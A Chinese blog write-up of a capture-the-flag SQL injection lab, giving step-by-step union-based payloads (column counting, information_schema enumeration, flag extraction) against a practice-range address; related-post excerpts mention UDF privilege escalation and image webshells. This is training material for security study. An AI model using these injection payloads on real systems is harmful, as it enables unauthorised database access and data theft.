安鸾渗透实战平台|SQL数字型注入详细教程

已于 2022-05-06 08:12:57 修改
阅读量1.4k 收藏 4
点赞数 1
文章标签: SQL注入 MySQL information_schema 渗透测试 靶场
于 2022-05-06 01:22:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67262179/article/details/124600363
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

主要是针对于Mysql 5.0版本即以上的sql注入漏洞的利用

需要了解的知识包括
1、mysql数据库的基本查询语句格式
2、mysql数据库版本的不同产生的具体变化
3、group_cat、binary函数的含义及使用
4、常用注入语句及原理

一、Mysql默认的information库基本结构

1.schemata表内容

	该表记录数据库内全部的库名称,并且不重复。此处重点使用**Schema_name**

2.tables表内容

该表记录数据库内的库民、表名、字段,内容存在重复。此处重点使用**table_name**

3.columns表内容

该表记录数据库库名、表名、字段名,一一对应。此处重点使用Column_name

二、渗透靶场地址

http://47.103.94.191:8034/

三、mysql渗透步骤

1.进入靶场,查看页面基本信息

在这里插入图片描述

2.判断是否存在注入

通过注入变量 id=1‘#
通过变量的注入测试可发现该网页后台是mysql并且存在sql注入

3.判断是否存在 符号过滤

具体方法则通过符号注入测试是否能正常回显页面,不能则可能存在符号过滤

例如: id=1 ’ and 1=1 可判断是否存在 “=”过滤,若存在可使用like语句绕过

4.判断数据库字段列名数量

使用order by语句连续查出字段列名数量。
表示通过第一字段的顺序进行排序,当输入order by x报错时,就说明没有这个字段,就可以得到输出的字段数了
–查询字段列列名数量为14

结果为:
在这里插入图片描述

5.使用联合查询判断显位点

 -1'  union select 1,2,3 ,4,5,6,7,8,9,10,11,12,13,14 #

结果为:
在这里插入图片描述
通过语句判错的方式找到显位点为3,9

6.基本信息收集

基本信息收集
服务器系统:@@version_compile_os语句------linux-glibc2.12
当前数据库用户:user()语句------------------------test@192.168.96.2
数据库版本型号:version()语句---------------------5.5.62
数据库名:database()语句--------------------------- cms

 **1'  union select 1,2,version(),4,5,6,7,8,database(),10,11,12,13,14 #**

结果为:
在这里插入图片描述

7.查询指定数据(cms)库下所有的表名

根据Mysql数据结构层级逐一从数据库–>表名–>字段名–>具体信息的顺序获取信息
注意:Mysql数据库5.0及以上版本存在information库,其中包括三个重要的表,分别为information.schema.schematainfromation.schema.tablesinfromation.schema.columns分别记录了数据库类的所有库名、表名和字段名

**1' union select 1,2,binary(group_concat(table_name)),4,5,6,7,8,9,10,11,12,13,14  from information_schema.tables where table_schema like 'cms'#**

结果为:
在这里插入图片描述

8.查询指定表明下的所有字段名

根据第六步查询到的所有表名,查询所有字段名

**1'  union select 1,2,binary(group_concat(column_name)),4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name like 'this_is_flag'#**

结果为:
在这里插入图片描述

9.查询具体信息

根据第七部查询的所有字段名获取具体信息

1'  union select 1,2,binary(id),4,5,6,7,8,binary(flag),10,11,12,13,14 from this_is_flag#

结果为:
在这里插入图片描述

四、总结

提示:这里对文章进行总结:
第一次写write up,不足之处还请各位大佬批评指出。本次sql注入很轻松完成,最后注意查询具体信息时语句为:

1'  union select 1,2,binary(id),4,5,6,7,8,binary(flag),10,11,12,13,14 from this_is_flag#

为什么不是’this_is_flag’而是this_is_flag?值得思考

Gump640
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安鸾文件上传
MCTSOG的博客
03-03 657
文件上传 安鸾渗透实战平台-Nginx解析漏洞 Nginx解析漏洞原理及复现 制作一图片马,然后上传,然后用蚁剑连接 http://www.whalwl.site:8020/uploadfiles/025108c5577eacf12c2e26e14dcc8a71.jpg/a.php(已失效) 查找flag 安鸾渗透实战平台-文件上传01 这就是个属于文件上传的前端验证,绕过前端即可 (可以删除网页源码中的检测内容,或者关闭浏览器的js功能) 然后上传,然后用蚁剑连接,查找flag 安鸾渗透实战平台-文件上传
安鸾渗透实战平台-sql注入
weixin_48421613的博客
01-04 3213
sql注入安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入SQL字符型注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索型注入总结 SQL字符型注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
安鸾学院靶场——安全基础
最新发布
qq_55202378的博客
06-13 1240
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
linux mysql udf 提权
ddr12231的博客
05-09 681
连接远程数据库 查看插件库路径 show variables like '%plugin%'; 写入udf库到插件目录: select unhex('7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000...
sql注入-数字型注入步骤
qq_73661602的博客
06-21 823
select * from table where id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema = '数据库名' and table_name='表名';(如果说屏幕上有两个显示位置,那我们就给两个参数1,2。因为数据库返回的字段不一定都会显示在前端中,因此我们需要找出显示的通道;确认通道后,我们按照按顺序分别找出数据库,表,列;
SQL注入----数字型
weixin_43622525的博客
02-16 1650
目录 环境 实验 1、访问sqli-labs网站 2、寻找注入点 3、判断网站查询的字段数 ​4、判断网站的回显位置 5、获取网站当前所在数据库的库名 6、获取数据库security的全部表名​ 7、获取users表的全部字段名​ 8、获取users表id、username和password字段的全部值。 环境 windows 10 phpstudy2018 ,sqli-labs靶场,Firefox浏览器插件hackbar 实验 payload又称为攻击载荷,主要是用来建立目标
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
sql注入之数字型注入
08-02
SQL 注入之数字型注入 SQL 注入之数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
SQL注入绕过实战案例
08-31
我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台SQL注入SQL Injection)是攻击者在Web应用的输入参数中插入恶意SQL代码,从而控制或操纵后台数据库服务器的一种技术。这种...
sql注入-不同数据类型注入
xiaoheizi的博客
06-28 316
原因是程序员为了防止SQL注入,就会调用几种转义函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上斜杠(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和斜杠(\)组合被当作一个汉字,从而保留单或双引号,使其发挥应有的作用。可以发现就算闭合了【''】依然无法注入成功,是因为我们输入的【'】被在前加上斜杠(\)进行了转义,无法发挥作用。
SQL注入(一):数字型(手注)+利用+爆破
NSQ0207的博客
07-19 1139
查询语句:select id,email from member where username=$id
安鸾渗透实战平台|SQL数字型GET注入02
m_de_g的博客
12-04 1488
安鸾渗透实战平台|SQL数字型GET注入02 一、渗透靶场地址 http://whalwl.work:8034/ 二、渗透实战 1.开始以为渗透后台,避免采坑 admin' or 1=1 # 123 直接就进入后台啦 2.实战开始,在搜索中输入1',报错 1' 3.当我们在后面加个#时,正常回显 1'# 4.判断or,and,空格或等号是否被过滤 1' or 1=1# 1' and 1=1# 根据报错信息,发现过滤了等号,使用like绕过 1' or 1 like 1# 1' a
SQL注入基础--数字型注入
qq_42988351的博客
04-02 7626
参考 参考学习链接 学习笔记–基础篇–sql注入(数字型) SQL注入简述 SQL注入,就是利用现有Web应用程序,构建特殊的参数输入,将(恶意的)SQL语句注入到后台数据库引擎,最终达到欺骗服务器执行恶意SQL语句的目的。 SQL注入的本质是后台SQL语句使用了拼接查询,未对用户输入的数据作安全处理。 SQL注入分类 根据注入形式的不同,可分为: 数字型注 字符型注 搜索型注入 根据请求方式的不同,可分为: GET型注 POST型注 HEADER型注入 根据注入点位置的不同,可分为: 列
安鸾渗透实战平台sql注入) 伪静态&搜索注入 (100分)
weixin_50985113的博客
02-08 492
安鸾渗透实战平台sqlmapbp。
Webservice之应用协议SOAP
心火燃烧!
11-08 592
什么是SOAP? SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息。或者更简单地说:SOAP 是用于访问网络服务的协议。 SOAP 指简易对象访问协议 SOAP 是一种通信协议 SOAP 用于应用程序之间的通信 SOAP 是一种用于发送消息的格式 SOAP 被设计用来通过因特网进行通信 SOAP 独立于平台 SOAP 独立于语言 SOAP 基于 XML SOAP...
01-sql-联合查询
居上
10-18 354
01-sql-联合查询查询语法条件过程探测网站是否存在注入点查询当前数据库中数据表的列数查找回显位查询当前数据库中数据表的列数查询数据后台账号和密码 查询 语法 select… union select… 条件 1.查询的两张表具有列数 2.查询的两张表具有相同的字段 过程 探测网站是否存在注入点 打开网站主页,随便打开一个一条新闻 http://192.168.36.131/cms/show.php?id=33 可以看到URL中出现id,改变id值,页面出现跳转 http://192.168.36.
SQL 数字型注入详解 + iwebsec实例
m0_50917178的博客
12-04 6333
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsec和Webgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字型注入原理 当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞,
安鸾sql报错型注入02
07-25
对于安鸾SQL报错型注入02,报错注入是利用网站的报错信息来带出我们想要的信息。在报错注入中,我们可以使用一些常用的命令来测试平台和获取信息。其中,floor()+rand()+group()函数是一种常用的报错注入命令。另外,还可以使用extractvalue()函数来进行注入。\[2\]\[3\] 请注意,SQL注入是一种安全漏洞,它可以允许攻击者执行恶意的SQL语句,从而获取敏感信息或者对数据库进行破坏。为了保护网站的安全,建议开发人员采取相应的防护措施,如使用参数化查询、输入验证和过滤等。 #### 引用[.reference_title] - *1* [安鸾渗透实战平台|SQL数字型GET注入02](https://blog.csdn.net/m_de_g/article/details/121705420)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [【SQL注入03】报错注入实例操作](https://blog.csdn.net/Fighting_hawk/article/details/123003447)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值